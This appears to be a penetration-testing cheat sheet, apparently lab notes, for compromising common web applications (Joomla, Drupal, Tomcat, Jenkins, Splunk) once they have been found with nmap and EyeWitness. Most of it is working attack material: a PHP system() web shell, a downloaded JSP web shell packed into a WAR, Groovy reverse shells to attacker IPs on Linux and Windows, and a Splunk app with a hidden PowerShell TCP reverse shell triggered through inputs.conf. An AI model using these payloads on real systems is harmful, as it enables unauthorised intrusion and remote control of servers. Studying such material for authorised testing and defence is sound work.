Skip to content

Attacking Common Application

Application Discovery & Enumeration

sudo  nmap -p 80,443,8000,8080,8180,8888,10000 --open -oA web_discovery -iL scope_list

Using EyeWitness

source eyewitness-venv/bin/activate
python Python/EyeWitness.py --web -x web_discovery.xml -d inlanefreight_eyewitness

WordPress

  • WPScan
  • WordPress themes are located at /wp-content/themes/<theme name>.

Joomla

droopescan

droopescan scan joomla --url http://dev.inlanefreight.local/

When you have access to Control Panel (/administrator/index.php):

  1. Click on Templates on the bottom left under Configuration to pull up the templates menu.
  2. Click on a template name. This will bring us to the Templates: Customise page.
  3. Click on a page to pull up the page source.
  4. Insert PHP code like: system($_GET['cmd']); 5.
curl -s http://example.com/templates/<template name>/file.php?cmd=id

Drupal

droopescan

droopescan scan drupal -u http://drupal.inlanefreight.local

RCE using PHP Filter module

Download module

wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz

Once downloaded go to Administration > Reports > Available updates.

Once the module is installed, we can click on Content and create a new basic page.

Tomcat

Login Brute Force

Use the auxiliary/scanner/http/tomcat_mgr_login Metasploit module

Tomcat Manager - WAR File Upload

Browse to /manager/html.

wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
zip -r backup.war cmd.jsp

Upload the backup.war file and go to /backup/cmd.jsp.

Jenkins

The script console (/script) allows a user to run Apache Groovy scripts.

Linux Host

def cmd = 'id'
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = cmd.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println sout

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.14.15/8443;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Windows Host

def cmd = "cmd.exe /c dir".execute();
println("${cmd.text}")

String host="10.10.10.10";
int port=4444;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Splunk

Reverse shell via package upload

Reference: https://github.com/0xjpuff/reverse_shell_splunk

Directory structure

splunk_shell
├── bin
│   ├── rev.py
│   ├── run.bat
│   └── run.ps1
└── default
    └── inputs.conf

run.ps1

$client = New-Object System.Net.Sockets.TCPClient('10.10.14.15',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

run.bat

@ECHO OFF
PowerShell.exe -exec bypass -w hidden -Command "& '%~dpn0.ps1'"
Exit

inputs.conf

[script://./bin/rev.py]
disabled = 0
interval = 10
sourcetype = shell

[script://.\bin\run.bat]
disabled = 0
sourcetype = shell
interval = 10

tar -cvzf updater.tar.gz splunk_shell/

Start a listener. Then go to /en-US/manager/search/apps/local endpoint and choose Install app from file.